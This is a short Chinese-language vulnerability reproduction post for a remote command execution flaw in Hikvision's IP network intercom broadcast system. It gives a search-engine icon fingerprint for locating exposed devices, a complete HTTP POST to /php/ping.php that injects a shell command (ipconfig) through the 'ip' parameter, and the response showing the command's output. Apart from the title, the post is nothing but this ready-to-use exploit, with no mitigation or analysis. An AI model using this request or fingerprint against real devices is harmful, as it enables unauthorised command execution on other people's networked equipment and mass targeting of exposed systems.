【漏洞复现】海康威视IP网络对讲广播系统远程命令执行漏洞

web.icon=="e854b2eaa9e4685a95d8052d5e3165bc"

POST /php/ping.php HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Content-Length: 51Accept: application/json, text/javascript, */*; q=0.01Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeContent-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

HTTP/1.1 200 OKServer: nginx/1.18.0Date: Tue, 02 Jan 2024 07:47:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.7Access-Control-Allow-Origin: *Access-Control-Allow-Headers: X-Requested-WithAccess-Control-Allow-Methods: GET,POST,OPTIONSContent-Length: 463

 ["","Windows IP u914du7f6e","","","u4ee5u592au7f51u9002u914du5668 u4ee5u592au7f51:","","   u8fdeu63a5u7279u5b9au7684 DNS u540eu7f00 . . . . . . . :","   u672cu5730u94feu63a5 IPv6 u5730u5740. . . . . . . . : fe80::6d38:2c60:9aa6:1142%2","   IPv4 u5730u5740 . . . . . . . . . . . . : 172.17.32.14","   u5b50u7f51u63a9u7801  . . . . . . . . . . . . : 255.255.240.0","   u9ed8u8ba4u7f51u5173. . . . . . . . . . . . . : 172.17.32.1"]